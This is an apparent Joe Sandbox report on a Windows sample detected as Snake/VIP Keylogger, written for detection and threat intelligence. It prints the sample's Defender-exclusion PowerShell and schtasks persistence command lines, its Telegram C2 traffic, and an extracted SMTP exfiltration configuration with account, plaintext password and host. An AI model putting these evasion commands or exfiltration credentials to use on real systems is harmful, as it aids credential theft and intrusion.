Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe

Overview

General Information

Sample name:SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
Analysis ID:1634905
MD5:e1e09695af116cd1a2e1ae594504c2ff
SHA1:d54f2a1ef496b557ac89d9181e401f9efc31f35d
SHA256:918433918bca612e76f478737ce42aa97e6c387cb33e53abfe806c1a925b5677
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe" MD5: E1E09695AF116CD1A2E1AE594504C2FF)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7852 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • svchost.exe (PID: 7972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • vQzHzddZ.exe (PID: 8152 cmdline: C:\Users\user\AppData\Roaming\vQzHzddZ.exe MD5: E1E09695AF116CD1A2E1AE594504C2FF)
    • schtasks.exe (PID: 7452 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEF03.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "serverche399@gpsamsterdamqroup.com", "Password": "     j4YX(KT7UCZ1      ", "Host": "fiber13.dnsiaas.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "serverche399@gpsamsterdamqroup.com", "Password": "     j4YX(KT7UCZ1      ", "Host": "fiber13.dnsiaas.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x167a:$a1: get_encryptedPassword
      • 0x1993:$a2: get_encryptedUsername
      • 0x1498:$a3: get_timePasswordChanged
      • 0x1593:$a4: get_passwordField
      • 0x1690:$a5: set_encryptedPassword
      • 0x2cea:$a7: get_logins
      • 0x2c4d:$a10: KeyLoggerEventArgs
      • 0x28b2:$a11: KeyLoggerEventArgsEventHandler
      00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 30 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.vQzHzddZ.exe.405cdb0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            7.2.vQzHzddZ.exe.405cdb0.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              7.2.vQzHzddZ.exe.405cdb0.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                7.2.vQzHzddZ.exe.405cdb0.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2ba7a:$a1: get_encryptedPassword
                • 0x2bd93:$a2: get_encryptedUsername
                • 0x2b898:$a3: get_timePasswordChanged
                • 0x2b993:$a4: get_passwordField
                • 0x2ba90:$a5: set_encryptedPassword
                • 0x2d0ea:$a7: get_logins
                • 0x2d04d:$a10: KeyLoggerEventArgs
                • 0x2ccb2:$a11: KeyLoggerEventArgsEventHandler
                7.2.vQzHzddZ.exe.405cdb0.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x398d8:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38f7b:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x391d8:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39bb7:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 43 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ParentProcessId: 7708, ParentProcessName: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", ProcessId: 7816, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ParentProcessId: 7708, ParentProcessName: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", ProcessId: 7816, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEF03.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEF03.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vQzHzddZ.exe, ParentImage: C:\Users\user\AppData\Roaming\vQzHzddZ.exe, ParentProcessId: 8152, ParentProcessName: vQzHzddZ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpEF03.tmp", ProcessId: 7452, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ParentProcessId: 7708, ParentProcessName: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp", ProcessId: 7852, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ParentProcessId: 7708, ParentProcessName: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vQzHzddZ.exe", ProcessId: 7816, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7972, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ParentProcessId: 7708, ParentProcessName: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp", ProcessId: 7852, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T06:28:11.628151+010028033053Unknown Traffic192.168.2.449722104.21.16.1443TCP
                2025-03-11T06:28:14.039816+010028033053Unknown Traffic192.168.2.449725104.21.16.1443TCP
                2025-03-11T06:28:14.404177+010028033053Unknown Traffic192.168.2.449726104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T06:28:06.580012+010028032742Potentially Bad Traffic192.168.2.449715158.101.44.24280TCP
                2025-03-11T06:28:09.345551+010028032742Potentially Bad Traffic192.168.2.449720158.101.44.24280TCP
                2025-03-11T06:28:09.486297+010028032742Potentially Bad Traffic192.168.2.449715158.101.44.24280TCP
                2025-03-11T06:28:11.748944+010028032742Potentially Bad Traffic192.168.2.449720158.101.44.24280TCP
                2025-03-11T06:28:12.283146+010028032742Potentially Bad Traffic192.168.2.449724158.101.44.24280TCP
                2025-03-11T06:28:14.689510+010028032742Potentially Bad Traffic192.168.2.449728158.101.44.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T06:28:33.841584+010018100071Potentially Bad Traffic192.168.2.449758149.154.167.220443TCP
                2025-03-11T06:28:35.971532+010018100071Potentially Bad Traffic192.168.2.449760149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeAvira: detection malicious, Label: HEUR/AGEN.1357257
                Found malware configuration
                Source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "serverche399@gpsamsterdamqroup.com", "Password": " j4YX(KT7UCZ1 ", "Host": "fiber13.dnsiaas.com", "Port": "587"}
                Source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "serverche399@gpsamsterdamqroup.com", "Password": " j4YX(KT7UCZ1 ", "Host": "fiber13.dnsiaas.com", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeVirustotal: Detection: 51%Perma Link
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeVirustotal: Detection: 51%Perma Link
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeReversingLabs: Detection: 34%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: serverche399@gpsamsterdamqroup.com
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: j4YX(KT7UCZ1
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: fiber13.dnsiaas.com
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: lukasnakelogger@dklak.cam
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: 587
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor:
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: serverche399@gpsamsterdamqroup.com
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: j4YX(KT7UCZ1
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: fiber13.dnsiaas.com
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: lukasnakelogger@dklak.cam
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor: 587
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpackString decryptor:

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49718 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49721 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00DFF8E9h6_2_00DFF631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00DFFD41h6_2_00DFFA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063E2D41h6_2_063E2A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063E3308h6_2_063E2EF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063E3308h6_2_063E3236
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063ED4C1h6_2_063ED218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_063E0673
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063ED919h6_2_063ED670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063E3308h6_2_063E2EE2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EDD71h6_2_063EDAC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063E0D0Dh6_2_063E0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063E16F8h6_2_063E0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EE1C9h6_2_063EDF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EE621h6_2_063EE378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EEA79h6_2_063EE7D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EEED1h6_2_063EEC28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_063E0853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_063E0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EF329h6_2_063EF080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EF781h6_2_063EF4D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063EFBD9h6_2_063EF930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063ED069h6_2_063ECDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00E5F8E9h11_2_00E5F631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00E5FD41h11_2_00E5FA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06362D41h11_2_06362A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06363308h11_2_06362EF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06363308h11_2_06363236
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636D4C1h11_2_0636D218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06360673
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636D919h11_2_0636D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06363308h11_2_06362EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636DD71h11_2_0636DAC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06360D0Dh11_2_06360B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063616F8h11_2_06360B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636E1C9h11_2_0636DF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636E621h11_2_0636E378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636EA79h11_2_0636E7D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636EED1h11_2_0636EC28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06360853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06360040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636F329h11_2_0636F080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636F781h11_2_0636F4D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636FBD9h11_2_0636F930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0636D069h11_2_0636CDC0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49760 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49758 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
